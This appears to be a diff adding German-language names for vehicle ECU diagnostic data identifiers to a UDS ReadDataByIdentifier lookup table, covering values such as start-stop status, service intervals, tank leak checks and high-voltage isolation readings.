+UDS_RDBI.dataIdentifiers[0x6203] = "Start Stopp Startanforderer HDC" # or Zaehler Ueberfuellung Read ASSYST Warnspeicher Zaehler Ueberfuellung +UDS_RDBI.dataIdentifiers[0x6204] = "Stoppverbot Verursacher System" # or Zaehler Unterfuellung 2 Read ASSYST Warnspeicher Zaehler Unterfuellung +UDS_RDBI.dataIdentifiers[0x6205] = "Typ erstmaliges Auftreten Read ASSYST Warnspeicher Typ erstmaliges" # or Start Stopp vorhFStatus +UDS_RDBI.dataIdentifiers[0x6206] = "Start Stopp vorhFStatus km Stand" # or Typ 9letztes Auftreten Read ASSYST Warnspeicher Typ 9letztes +UDS_RDBI.dataIdentifiers[0x6207] = "Typ 8letztes Auftreten Read ASSYST Warnspeicher Typ 8letztes" # or Stoppverbot Verursacher STCSys +UDS_RDBI.dataIdentifiers[0x6208] = "Start Stopp Startanforderer STC" # or Typ 7letztes Auftreten Read ASSYST Warnspeicher Typ 7letztes +UDS_RDBI.dataIdentifiers[0x6209] = "Typ 6letztes Auftreten Read ASSYST Warnspeicher Typ 6letztes" # or Start Stopp erweiterte Analyse +UDS_RDBI.dataIdentifiers[0x620a] = "Typ 5letztes Auftreten Read ASSYST Warnspeicher Typ 5letztes" # or Start Stopp Interface MSG CPC +UDS_RDBI.dataIdentifiers[0x620b] = "Start Stopp Interface CPC MSG" # or Typ 4letztes Auftreten Read ASSYST Warnspeicher Typ 4letztes +UDS_RDBI.dataIdentifiers[0x620c] = "Typ 3letztes Auftreten Read ASSYST Warnspeicher Typ 3letztes" # or Startanforderung Hybrid +UDS_RDBI.dataIdentifiers[0x620d] = "Startanforderung Erststart" # or Typ vorletztes Auftreten Read ASSYST Warnspeicher Typ vorletztes +UDS_RDBI.dataIdentifiers[0x620e] = "Typ letztmaliges Auftreten Read ASSYST Warnspeicher Typ letztmaliges" +UDS_RDBI.dataIdentifiers[0x620f] = "Getriebefreigabe Automatgetriebe" +UDS_RDBI.dataIdentifiers[0x6210] = "Sekundaerluft Aktiv" # or erstmaliges Auftreten Read ASSYST Warnspeicher km Stand erstmaliges +UDS_RDBI.dataIdentifiers[0x6211] = "9letztes Auftreten Read ASSYST Warnspeicher km Stand 9letztes" # or Sekundaerluftdiagnose Aktiv, SLS-Diagnose aktiv +UDS_RDBI.dataIdentifiers[0x6212] = "Sekundaerluft Relative Sekundaerluftmasse" # or 8letztes Auftreten Read ASSYST Warnspeicher km Stand 8letztes +UDS_RDBI.dataIdentifiers[0x6213] = "Stoppverbot Verursacher Ringspeicher 4" # or 7letztes Auftreten Read ASSYST Warnspeicher km Stand 7letztes +UDS_RDBI.dataIdentifiers[0x6214] = "Stoppverbot Verursacher Ringspeicher 5" # or Sekundaerluft Relative SL Masse Gefiltert, 6letztes Auftreten Read ASSYST Warnspeicher km Stand 6letztes +UDS_RDBI.dataIdentifiers[0x6215] = "5letztes Auftreten Read ASSYST Warnspeicher km Stand 5letztes" +UDS_RDBI.dataIdentifiers[0x6216] = "Sekundaerluft Relative SL Masse Ventil Check" # or 4letztes Auftreten Read ASSYST Warnspeicher km Stand 4letztes +UDS_RDBI.dataIdentifiers[0x6217] = "3letztes Auftreten Read ASSYST Warnspeicher km Stand 3letztes" +UDS_RDBI.dataIdentifiers[0x6218] = "vorletztes Auftreten Read ASSYST Warnspeicher km Stand vorletztes" +UDS_RDBI.dataIdentifiers[0x6219] = "letztes Auftreten Read ASSYST Warnspeicher km Stand letztes" +UDS_RDBI.dataIdentifiers[0x621a] = "Oeldatensatz erstmaligesAuftreten" # or ID Oeldatensatz erstmaligesAuftreten, Oeldatensatz erstmaligesAuftreten Read ASSYST Warnspeicher ID Oeldatensatz erstmaligesAuftreten +UDS_RDBI.dataIdentifiers[0x621b] = "Oeldatensatz 9letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 9letztes" # or ID Oeldatensatz 9letztes, Oeldatensatz 9letztes +UDS_RDBI.dataIdentifiers[0x621c] = "ID Oeldatensatz 8letztes" # or Oeldatensatz 8letztes, Oeldatensatz 8letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 8letztes +UDS_RDBI.dataIdentifiers[0x621d] = "Oeldatensatz 7letztes" # or Oeldatensatz 7letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 7letztes, ID Oeldatensatz 7letztes +UDS_RDBI.dataIdentifiers[0x621e] = "Oeldatensatz 6letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 6letztes" # or Oeldatensatz 6letztes, ID Oeldatensatz 6letztes +UDS_RDBI.dataIdentifiers[0x621f] = "Oeldatensatz 5letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 5letztes" # or ID Oeldatensatz 5letztes, Oeldatensatz 5letztes +UDS_RDBI.dataIdentifiers[0x6220] = "Oeldatensatz 4letztes" # or Kupplungsschutz km Ueberschreiten Kupplungstemperatur erstmalig, Oeldatensatz 4letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 4letztes, ID Oeldatensatz 4letztes, Tankdichtigkeitspruefung Druckverlustgradient Ist +UDS_RDBI.dataIdentifiers[0x6221] = "ID Oeldatensatz 3letztes" # or Oeldatensatz 3letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 3letztes, Oeldatensatz 3letztes, Kupplungsschutz Kupplungstemperatur erstmalig, Tankdichtigkeitspruefung Druckverlustgradient Fehlerschwelle +UDS_RDBI.dataIdentifiers[0x6222] = "ID Oeldatensatz vorletztes" # or Oeldatensatz vorletztes, Oeldatensatz vorletztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz vorletztes, Kupplungsschutz Anzahl Halten am Berg Stufe1, Tankdichtigkeitspruefung Aufbaugradient Vorhanden +UDS_RDBI.dataIdentifiers[0x6223] = "Oeldatensatz letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz letztes" # or Tankdichtigkeitspruefung Fertig, Oeldatensatz letztes, Kupplungsschutz Anzahl Halten am Berg Stufe2, ID Oeldatensatz letztes +UDS_RDBI.dataIdentifiers[0x6224] = "Kupplungsschutz km Halten am Berg Stufe1" # or Geschwindigkeit erstmaligesAuftreten Read ASSYST Warnspeicher Geschwindigkeit erstmaligesAuftreten, Tankdichtigkeitspruefung +UDS_RDBI.dataIdentifiers[0x6225] = "Geschwindigkeit 9letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 9letztes" # or Kupplungsschutz Kupplungstemperatur Halten am Berg Stufe1, Tankdichtigkeitspruefung Abbruchstatus +UDS_RDBI.dataIdentifiers[0x6226] = "Kupplungsschutz Ringspeicher" # or Tankdichtigkeitspruefung Grobleck Erkannt, Geschwindigkeit 8letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 8letztes +UDS_RDBI.dataIdentifiers[0x6227] = "Geschwindigkeit 7letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 7letztes" # or Tankdichtigkeitspruefung Ausgasung Zu Gross, Kupplungsschutz Ringspeicher Kupplungstemperatur +UDS_RDBI.dataIdentifiers[0x6228] = "Tankdichtigkeitspruefung Aktiv" # or Geschwindigkeit 6letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 6letztes, Kupplungsschutz Ringspeicher km +UDS_RDBI.dataIdentifiers[0x6229] = "Geschwindigkeit 5letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 5letztes" # or Tankdichtigkeitspruefung Sammelabbruch, Kupplungsschutz Ringspeicher Dauer +UDS_RDBI.dataIdentifiers[0x622a] = "Tankdichtigkeitspruefung Unterdruckabbaugradient" # or Geschwindigkeit 4letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 4letztes +UDS_RDBI.dataIdentifiers[0x622b] = "Geschwindigkeit 3letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 3letztes" +UDS_RDBI.dataIdentifiers[0x622c] = "Geschwindigkeit vorletztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit vorletztes" +UDS_RDBI.dataIdentifiers[0x622d] = "Geschwindigkeit letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit letztes" +UDS_RDBI.dataIdentifiers[0x6230] = "Tankdichtigkeitspruefung Lambdaregler Abbruch" # or Drehzahl erstmaliges Auftreten Read ASSYST Warnspeicher Drehzahl erstmaliges, Kupplungsschutz Anzahl Kombimeldung Kupplung heiss +UDS_RDBI.dataIdentifiers[0x6231] = "Tankdichtigkeitspruefung Max Abweichung Lambda" # or Kupplungsschutz km letzte Anzeige Kupplung heiss, Drehzahl 9letztes Auftreten Read ASSYST Warnspeicher Drehzahl 9letztes +UDS_RDBI.dataIdentifiers[0x6232] = "Drehzahl 8letztes Auftreten Read ASSYST Warnspeicher Drehzahl 8letztes" # or Tankentlueftung Ausgasungswert +UDS_RDBI.dataIdentifiers[0x6233] = "Kupplungsschutz km erster HauptplausiError" # or Drehzahl 7letztes Auftreten Read ASSYST Warnspeicher Drehzahl 7letztes, Tankentlueftung Zeit Seit Start Minus Parkzeit +UDS_RDBI.dataIdentifiers[0x6234] = "Kupplungsschutz km letzter HauptplausiError" # or Drehzahl 6letztes Auftreten Read ASSYST Warnspeicher Drehzahl 6letztes, Tankdichtigkeitspruefung Basisbedingung Erfuellt +UDS_RDBI.dataIdentifiers[0x6235] = "Drehzahl 5letztes Auftreten Read ASSYST Warnspeicher Drehzahl 5letztes" # or Kupplungsschutz Laufstrecke mit HauptplausiError, Tankdichtigkeitspruefung Freigabebedingung Sperrfehler +UDS_RDBI.dataIdentifiers[0x6236] = "Drehzahl 4letztes Auftreten Read ASSYST Warnspeicher Drehzahl 4letztes" # or Tankdichtigkeitspruefung Freigabebedingung Lambda +UDS_RDBI.dataIdentifiers[0x6237] = "Drehzahl 3letztes Auftreten Read ASSYST Warnspeicher Drehzahl 3letztes" # or Tankdichtigkeitspruefung Freigabebedingung Tankdruck +UDS_RDBI.dataIdentifiers[0x6238] = "Drehzahl vorletztes Auftreten Read ASSYST Warnspeicher Drehzahl vorletztes" # or Tankdichtigkeitspruefung Freigabebedingung Batteriespannung +UDS_RDBI.dataIdentifiers[0x6239] = "Tankdichtigkeitspruefung Freigabebedingung Einspritzventile" # or Drehzahl letztes Auftreten Read ASSYST Warnspeicher Drehzahl letztes, Segelvorbedingung Fahrzustand +UDS_RDBI.dataIdentifiers[0x623a] = "Oeltemperatur erstmaliges Auftreten Read ASSYST Warnspeicher Oeltemperatur erstmaliges" # or Segelausloeser letztes Segeln +UDS_RDBI.dataIdentifiers[0x623b] = "Oeltemperatur 9letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 9letztes" +UDS_RDBI.dataIdentifiers[0x623c] = "Oeltemperatur 8letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 8letztes" # or Segeleintrittsbedingung +UDS_RDBI.dataIdentifiers[0x623d] = "Segelaustrittsbedingung letztes Segeln" # or Oeltemperatur 7letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 7letztes +UDS_RDBI.dataIdentifiers[0x623e] = "Oeltemperatur 6letztes" +UDS_RDBI.dataIdentifiers[0x623f] = "Segelaustrittsbedingungen" # or Oeltemperatur 5letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 5letztes +UDS_RDBI.dataIdentifiers[0x6240] = "Oeltemperatur 4letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 4letztes" # or Tankdichtigkeitspruefung Freigabebedingung Erkannt +UDS_RDBI.dataIdentifiers[0x6241] = "Tankentlueftung Relativer Gemischanteil" # or Relativer Gemischanteil Tankentlueftung, Oeltemperatur 3letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 3letztes +UDS_RDBI.dataIdentifiers[0x6242] = "Oeltemperatur vorletztes Auftreten Read ASSYST Warnspeicher Oeltemperatur vorletztes" # or Tankentlueftung Massenstrom, Massenstrom Tankentlueftung ins Saugrohr +UDS_RDBI.dataIdentifiers[0x6243] = "Oeltemperatur letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur letztes" +UDS_RDBI.dataIdentifiers[0x6244] = "Aktivkohlefilter Beladung" # or Beladung des Aktivkohlefilters, Segelverbot Verursacher Motor, rel Motorlast erstmaliges Auftreten Read ASSYST Warnspeicher rel Motorlast erstmaliges +UDS_RDBI.dataIdentifiers[0x6245] = "Relative Kraftstoffmasse" # or rel Motorlast 9letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 9letztes, Kraftstoffmasse Relativ +UDS_RDBI.dataIdentifiers[0x6246] = "rel Motorlast 8letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 8letztes" # or Aktivkohlefilter Beladung gefiltert, Beladung des Aktivkohlefilters - gefiltert +UDS_RDBI.dataIdentifiers[0x6247] = "Segelverf gbarkeit" # or rel Motorlast 7letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 7letztes +UDS_RDBI.dataIdentifiers[0x6248] = "rel Motorlast 6letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 6letztes" # or Segelstrategie +UDS_RDBI.dataIdentifiers[0x6249] = "rel Motorlast 5letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 5letztes" +UDS_RDBI.dataIdentifiers[0x624a] = "rel Motorlast 4letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 4letztes" +UDS_RDBI.dataIdentifiers[0x624b] = "Tankentlueftung LPV Sollwert" # or rel Motorlast 3letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 3letztes +UDS_RDBI.dataIdentifiers[0x624c] = "Tankentlueftung aktiv" # or rel Motorlast vorletztes Auftreten Read ASSYST Warnspeicher rel Motorlast vorletztes +UDS_RDBI.dataIdentifiers[0x624d] = "rel Motorlast letztes Auftreten Read ASSYST Warnspeicher rel Motorlast letztes" +UDS_RDBI.dataIdentifiers[0x624e] = "Zaehler Sensorfehler" +UDS_RDBI.dataIdentifiers[0x6250] = "Segeln" # or Restlaufzeit Read ASSYST Serviceintervall Restlaufzeit, Serviceintervall Restlaufzeit +UDS_RDBI.dataIdentifiers[0x6251] = "Strecke seit Oelwechsel Read ASSYST Serviceintervall Strecke seit Oelwechsel" # or Serviceintervall Strecke seit Oelwechsel, Klopfregelung Freigabe, Freigabe Klopfregelung, Segeln Aktiv +UDS_RDBI.dataIdentifiers[0x6252] = "Segeln Anforderung Motor" # or Serviceintervall Restlaufstrecke Anzeige, Restlaufstrecke Anzeige Read ASSYST Serviceintervall Restlaufstrecke Anzeige +UDS_RDBI.dataIdentifiers[0x6253] = "Startlaufstrecke Oelfehlvolumen" # or Lenkwinkel Adaptiert Max, Serviceintervall Startlaufstrecke Oelfehlvolumen, Ladungsbewegungsklappe Freigabe, Startlaufstrecke Oelfehlvolumen Read ASSYST Serviceintervall Startlaufstrecke Oelfehlvolumen +UDS_RDBI.dataIdentifiers[0x6254] = "Serviceintervall Restlaufstrecke Intern" # or Lenkwinkel Adaptiert Max Links +UDS_RDBI.dataIdentifiers[0x6255] = "Restlaufstrecke AdBlue Read ASSYST Serviceintervall Restlaufstrecke AdBlue" +UDS_RDBI.dataIdentifiers[0x6256] = "Schaltlinienverschiebung" # or Istmoment Verbrennungsmotor +UDS_RDBI.dataIdentifiers[0x6257] = "Fehlerspeicher Kilometer Seit Loeschen Read Fehlerspeicher Kilometer Seit Loeschen" # or Sollmoment Verbrennungsmotor, Gefahrene Kilometer seit letztem Fehlerspeicher loeschen oder Powerfail, Fehlerspeicher Kilometer Seit Loeschen F M Veh dist on last clear nvv +UDS_RDBI.dataIdentifiers[0x6258] = "Bedingung Einspritzventile aktiv" # or Istmoment Elektromaschine, Einspritzventile Freigabe +UDS_RDBI.dataIdentifiers[0x6259] = "Sollmoment Elektromaschine" +UDS_RDBI.dataIdentifiers[0x625a] = "Fehlerspeicher Zeit Seit Loeschen Read Fehlerspeicher Zeit Seit Loeschen" # or Fehlerspeicher Zeit Seit Loeschen F M Elapsed time since clear, Sollmoment aus der Momentenkoordination +UDS_RDBI.dataIdentifiers[0x625b] = "Statussignal aus der Momentenkoordination" +UDS_RDBI.dataIdentifiers[0x6260] = "LLDrehzahlbegrenzung Zeitzaehler bis Aktivierung" # or Einspritzung Uebergangskomp Adaptfaktor BA +UDS_RDBI.dataIdentifiers[0x6261] = "Restlaufstrecke Kraftstoff Read 1 ASSYST Serviceintervall Restlaufstrecke Kraftstoff" # or LLDrehzahlbegrenzung Zeitzaehler aktiv +UDS_RDBI.dataIdentifiers[0x6262] = "Einspritzung Uebergangskomp Adaptfaktor VA" # or Serviceintervall Tageszaehler, LLDrehzahlbegrenzung aktuelle Drehzahlgrenze +UDS_RDBI.dataIdentifiers[0x6263] = "Serviceintervall Freigegebene Oelsorten Byte1" # or Lastkurvenvorgabe Hybrid +UDS_RDBI.dataIdentifiers[0x6264] = "Massenstrom Nebenfuellungssignal Korrektur Faktor" # or Korrekturfaktor Massenstrom NFS, Lastkurvenvorgabe Hybrid Fehlerstatus, Serviceintervall Freigegebene Oelsorten Byte2 +UDS_RDBI.dataIdentifiers[0x6265] = "Korrekturfaktor langsamer MSA" # or Serviceintervall Startlaufzeit, Status Hybrid Modus Schalter, Massenstrom Langsamer Abgleich Korrektur +UDS_RDBI.dataIdentifiers[0x6266] = "Korrekturfaktor langsamer MSA (auch bei Fehlerfall in Betrieb)" # or Lastkurvenvorgabe Hybrid zulaessiges min Moment +UDS_RDBI.dataIdentifiers[0x6267] = "Korrekturfaktor Massenstrom NFS (HFM-Fehler o. DK aktiv)" # or Massenstrom Nebenfuellungssignal Korrektur Fehlerfall, Lastkurvenvorgabe Hybrid zulaessiges max Moment +UDS_RDBI.dataIdentifiers[0x6268] = "Massenstrom Schneller Abgleich Korrektur" +UDS_RDBI.dataIdentifiers[0x6269] = "Drosselklappe Leckluftmassenstrom" +UDS_RDBI.dataIdentifiers[0x626a] = "Massenstrom Abgas Kat" +UDS_RDBI.dataIdentifiers[0x626b] = "Abgasmassenstrom im Kat (DE" +UDS_RDBI.dataIdentifiers[0x626c] = "Massenstrom Abgas Hauptkat" +UDS_RDBI.dataIdentifiers[0x626d] = "Abgasmassenstrom Hauptkat (DE" +UDS_RDBI.dataIdentifiers[0x626e] = "Massenstrom Nebenfuellungssignal Korrektur Offset" +UDS_RDBI.dataIdentifiers[0x6270] = "Multiplikative Korrektur von fupsrl" # or MonLev3 trap reason error code +UDS_RDBI.dataIdentifiers[0x6271] = "Offsetkorrektur von pbrintuk w HFM/DSS Adaption" # or MonLev3 last occurred reset type +UDS_RDBI.dataIdentifiers[0x6272] = "Momentenadaption Leerlauf Klima Fahrstufe" # or MonLev3 reset causing core id +UDS_RDBI.dataIdentifiers[0x6273] = "MonLev3 last occurred reset symptom" # or Momentenadaption Leerlauf Fahrstufe +UDS_RDBI.dataIdentifiers[0x6274] = "MonLev3 data error address" # or Momentenadaption Leerlauf Klima +UDS_RDBI.dataIdentifiers[0x6275] = "MonLev3 SMU alarm handler error code0" # or Momentenadaption Leerlauf +UDS_RDBI.dataIdentifiers[0x6276] = "MonLev3 caller stack error address0" +UDS_RDBI.dataIdentifiers[0x6277] = "Momentenadaption Leerlauf Langzeitintegral" # or Delta Moment aus Momentenadaption - zeitl. Mittelwert des I-Anteils +UDS_RDBI.dataIdentifiers[0x6278] = "Anzahl Starts mit Benzin im Oel" +UDS_RDBI.dataIdentifiers[0x6279] = "Adaptierter Max. Lenkwinkel" +UDS_RDBI.dataIdentifiers[0x627a] = "Massenstrom ueber DK Offsetadaption eingeschwungen" +UDS_RDBI.dataIdentifiers[0x6280] = "HV Interlockfehler OpenCableDetection" +UDS_RDBI.dataIdentifiers[0x6281] = "HV Interlockfehler OpenCableDetection Interlock Zeitstempel" +UDS_RDBI.dataIdentifiers[0x6282] = "HV Isolationsfehlererkennung Widerstand Zustand1" +UDS_RDBI.dataIdentifiers[0x6283] = "Status der Wegfahrsperre" # or HV Isolationsfehlererkennung Widerstand Zustand2 +UDS_RDBI.dataIdentifiers[0x6284] = "HV Isolationsfehlererkennung Widerstand Zustand3" +UDS_RDBI.dataIdentifiers[0x6285] = "HV Isolationsfehlererkennung Widerstand Zustand4" +UDS_RDBI.dataIdentifiers[0x6286] = "HV Isolationsfehlererkennung Widerstand Zustand5" +UDS_RDBI.dataIdentifiers[0x6287] = "HV Isolationsfehlererkennung Widerstand Zustand6" +UDS_RDBI.dataIdentifiers[0x6288] = "HV Isolationsfehlererkennung Widerstand Zustand7" +UDS_RDBI.dataIdentifiers[0x6289] = "HV Isolationsfehlererkennung Widerstand Zustand8" +UDS_RDBI.dataIdentifiers[0x628a] = "HV Isolationsfehlererkennung Widerstand Zustand9" +UDS_RDBI.dataIdentifiers[0x628b] = "HV Isolationsfehlererkennung Widerstand Zustand10" +UDS_RDBI.dataIdentifiers[0x6290] = "HV Sperre durch Motorhaube und Klemme15" +UDS_RDBI.dataIdentifiers[0x6291] = "Ueberwachungserweiterung Freigabe" +UDS_RDBI.dataIdentifiers[0x6292] = "Ueberwachungserweiterung Einzelfreigabe" +UDS_RDBI.dataIdentifiers[0x6293] = "Ueberwachungserweiterung MSG Anforderung aktiv" +UDS_RDBI.dataIdentifiers[0x62a0] = "Luefteranforderung Klima" +UDS_RDBI.dataIdentifiers[0x62a1] = "Luefteranforderung Ladelufttemperatur" +UDS_RDBI.dataIdentifiers[0x62a2] = "Luefteranforderung Tube Hybrid" +UDS_RDBI.dataIdentifiers[0x62a3] = "Luefteranforderung Getriebeoeltemperatur" +UDS_RDBI.dataIdentifiers[0x62a4] = "Luefteranforderung allgemein" +UDS_RDBI.dataIdentifiers[0x62a5] = "Luefteranforderung Kuehlmitteltemperatur dynamisch" +UDS_RDBI.dataIdentifiers[0x62a6] = "Luefteranforderung Kuehlmitteltemperatur NT1" +UDS_RDBI.dataIdentifiers[0x62a7] = "Luefteranforderung Kuehlmitteltemperatur NT2" +UDS_RDBI.dataIdentifiers[0x62b0] = "Masseband Widerstand DCDCWandler" +UDS_RDBI.dataIdentifiers[0x62b1] = "Masseband Widerstand Motor" +UDS_RDBI.dataIdentifiers[0x62b2] = "Masseband Widerstand Vertrauensintervall DCDCWandler" +UDS_RDBI.dataIdentifiers[0x62b3] = "Masseband Widerstand Vertrauensintervall Motor" +UDS_RDBI.dataIdentifiers[0x62b4] = "Masseband Widerstandswert gueltig DCDCWandler" +UDS_RDBI.dataIdentifiers[0x62b5] = "Masseband Widerstandswert gueltig Motor" +UDS_RDBI.dataIdentifiers[0x62b6] = "Masseband Spannungsdifferenz" +UDS_RDBI.dataIdentifiers[0x62c0] = "Start Stopp letzter misslungener Autostart km Stand" +UDS_RDBI.dataIdentifiers[0x62c1] = "Start Stopp letzter misslungener Autostart Analysewerte1" +UDS_RDBI.dataIdentifiers[0x62c2] = "Start Stopp letzter misslungener Autostart Analysewerte2" +UDS_RDBI.dataIdentifiers[0x62c3] = "Start Stopp Startanforderer Verursacher System" +UDS_RDBI.dataIdentifiers[0x62c4] = "Start Stopp Startanforderer Verursacher motorisch" +UDS_RDBI.dataIdentifiers[0x62c5] = "Drive Betrebsart aktuell" +UDS_RDBI.dataIdentifiers[0x62c6] = "Drive Betriebsart Aggregate" +UDS_RDBI.dataIdentifiers[0x62c7] = "Drive Aggegrate Zustand" +UDS_RDBI.dataIdentifiers[0x62c8] = "Drive erlaubte Betriebszust nde" # or Drive erlaubte Betriebszustaende +UDS_RDBI.dataIdentifiers[0x62c9] = "Drive Ursprungfehler" +UDS_RDBI.dataIdentifiers[0x62ca] = "Start Stopp Startanforderer Verursacher Motorlauf" +UDS_RDBI.dataIdentifiers[0x62cb] = "Start Stopp Startanforderer Verursacher Motorlauf" +UDS_RDBI.dataIdentifiers[0x62cc] = "Start Stopp Startanforderer Systemstart Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x62cd] = "Start Stopp Freigabe Zustandsberuhigung" +UDS_RDBI.dataIdentifiers[0x62ce] = "Drive Zustand Freigabe E Fahrt" +UDS_RDBI.dataIdentifiers[0x62cf] = "Start Stopp Startanforderung Zustand" +UDS_RDBI.dataIdentifiers[0x62d0] = "Engine In Use Histogram Ringpuffer OBL" +UDS_RDBI.dataIdentifiers[0x62d1] = "Drive Betriebsstrategie" +UDS_RDBI.dataIdentifiers[0x62df] = "Klimakompressor Drehzahl" +UDS_RDBI.dataIdentifiers[0x6300] = "Klimakompressor Strom" +UDS_RDBI.dataIdentifiers[0x6301] = "Klimakompressor Strom 48VEbene" +UDS_RDBI.dataIdentifiers[0x6302] = "Off Adaption Lernfilter Aktuell" +UDS_RDBI.dataIdentifiers[0x6303] = "Drive Lademoment minimal" +UDS_RDBI.dataIdentifiers[0x6304] = "DCDC HV Strom aktuell" +UDS_RDBI.dataIdentifiers[0x6305] = "Arbeitsdrehzahlregelung Aktivierungsbit plausibilisiert" +UDS_RDBI.dataIdentifiers[0x6306] = "Arbeitsdrehzahlregelung geforderte Motordrehzahl plausibilisert" +UDS_RDBI.dataIdentifiers[0x6307] = "Arbeitsdrehzahlregelung Max Moment Anforderung" +UDS_RDBI.dataIdentifiers[0x6308] = "Arbeitsdrehzahlregelung Momentenanforderung" +UDS_RDBI.dataIdentifiers[0x6309] = "Bremslichtsignal" +UDS_RDBI.dataIdentifiers[0x630a] = "Arbeitsdrehzalregelung Drehzahlanforderung plausibel" +UDS_RDBI.dataIdentifiers[0x630b] = "Arbeitsdrehzalregelung Plausibilisierung Fehler" +UDS_RDBI.dataIdentifiers[0x630c] = "Arbeitsdrehzahlregelung Min Moment Anforderung" +UDS_RDBI.dataIdentifiers[0x630d] = "Arbeitsdrehzahlregelung Durchgriff" +UDS_RDBI.dataIdentifiers[0x630e] = "Arbeitsdrehzahlregelung Momentenvorgabe I Anteil" +UDS_RDBI.dataIdentifiers[0x630f] = "Arbeitsdrehzahlregelung Momentenvorgabe P Anteil" +UDS_RDBI.dataIdentifiers[0x6310] = "Arbeitsdrehzahlregelung Momentenvorgabe D Anteil" +UDS_RDBI.dataIdentifiers[0x6311] = "Motormoment Max" +UDS_RDBI.dataIdentifiers[0x6312] = "Motormoment Min" +UDS_RDBI.dataIdentifiers[0x6313] = "Arbeitsdrehzahlregelung aktiv" +UDS_RDBI.dataIdentifiers[0x6314] = "Arbeitsdrehzahlregelung aktiv Sq" +UDS_RDBI.dataIdentifiers[0x6315] = "Arbeitsdrehzahlregelung geforderte Motordrehzahl" +UDS_RDBI.dataIdentifiers[0x6316] = "Arbeitsdrehzahlregelung geforderte Motordrehzahl Sq" +UDS_RDBI.dataIdentifiers[0x6317] = "Arbeitsdrehzahlregelung Info Plaus Fehler" +UDS_RDBI.dataIdentifiers[0x6330] = "Head Unit Variante Ruecksetzen erfolgreich" +UDS_RDBI.dataIdentifiers[0x6331] = "Luftmassenaenderung Pro Arbeitsspiel" +UDS_RDBI.dataIdentifiers[0x6332] = "Momentenanforderung Durch Reduzierstufe Ist" +UDS_RDBI.dataIdentifiers[0x6333] = "Momentenanforderung Durch Reduzierstufe Soll" +UDS_RDBI.dataIdentifiers[0x6334] = "Abgastemperatur Im Hauptkat Modelliert" +UDS_RDBI.dataIdentifiers[0x6335] = "Kat (DE" +UDS_RDBI.dataIdentifiers[0x6336] = "Phasengebernotlauf Phasensuche aktiv" +UDS_RDBI.dataIdentifiers[0x6337] = "Gangvorgabe" +UDS_RDBI.dataIdentifiers[0x6338] = "Ganganzeige aktueller Gang" +UDS_RDBI.dataIdentifiers[0x6339] = "Ganganzeige Zielgang" +UDS_RDBI.dataIdentifiers[0x633a] = "Abgastemperatur Nach Hauptkat Modelliert" +UDS_RDBI.dataIdentifiers[0x633b] = "Nach Kat (DE" +UDS_RDBI.dataIdentifiers[0x633c] = "Abgastemperatur Im Frontkat Modelliert" +UDS_RDBI.dataIdentifiers[0x633e] = "Abgastemperatur Im Kruemmer Modelliert" +UDS_RDBI.dataIdentifiers[0x6340] = "Ganganzeige aktuell eingelegter Gang" +UDS_RDBI.dataIdentifiers[0x6341] = "Ganganzeige aktuell eingelegter Gang SignalQualifier" +UDS_RDBI.dataIdentifiers[0x6342] = "Programmierbares Sondermodul Fehlerergebnis Start Stop" +UDS_RDBI.dataIdentifiers[0x6343] = "Programmierbares Sondermodul Motor Fern Stop aktiv" +UDS_RDBI.dataIdentifiers[0x6344] = "Programmierbares Sondermodul Motor Fern Start aktiv" +UDS_RDBI.dataIdentifiers[0x6345] = "Fahrzeuggeschwindigkeit Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x6346] = "Fahrzeuggeschwindigkeit" +UDS_RDBI.dataIdentifiers[0x6347] = "Ueberwachung Freigabe Schluesselstart" +UDS_RDBI.dataIdentifiers[0x6350] = "Powernet Data Hochvolt " +UDS_RDBI.dataIdentifiers[0x6351] = "Fahrzeuggeschwindigkeit ungefiltert" +UDS_RDBI.dataIdentifiers[0x6355] = "Kundenereignis erforderlich" +UDS_RDBI.dataIdentifiers[0x6356] = "Schuetzschaltung Verhinderer Cat1 Fehler" +UDS_RDBI.dataIdentifiers[0x6357] = "Schuetzschaltung Verhinderer Cat1 SNA" +UDS_RDBI.dataIdentifiers[0x6358] = "Schuetzschaltung Verhinderer Cat2 Fehler" +UDS_RDBI.dataIdentifiers[0x6359] = "Schuetzschaltung Verhinderer Cat2 SNA" +UDS_RDBI.dataIdentifiers[0x6360] = "Messe Modus" +UDS_RDBI.dataIdentifiers[0x6361] = "Automatikgetrtiebe Schaltmodus PT4" +UDS_RDBI.dataIdentifiers[0x6362] = "Automatikgetrtiebe man Modus permanent PT3" +UDS_RDBI.dataIdentifiers[0x6364] = "Standy Mode aktiv" +UDS_RDBI.dataIdentifiers[0x6370] = "Laufzeit gesamt" +UDS_RDBI.dataIdentifiers[0x6371] = "Laufzeit gesamt" +UDS_RDBI.dataIdentifiers[0x6372] = "Fahrzeuggeschwindigkeit CAN" 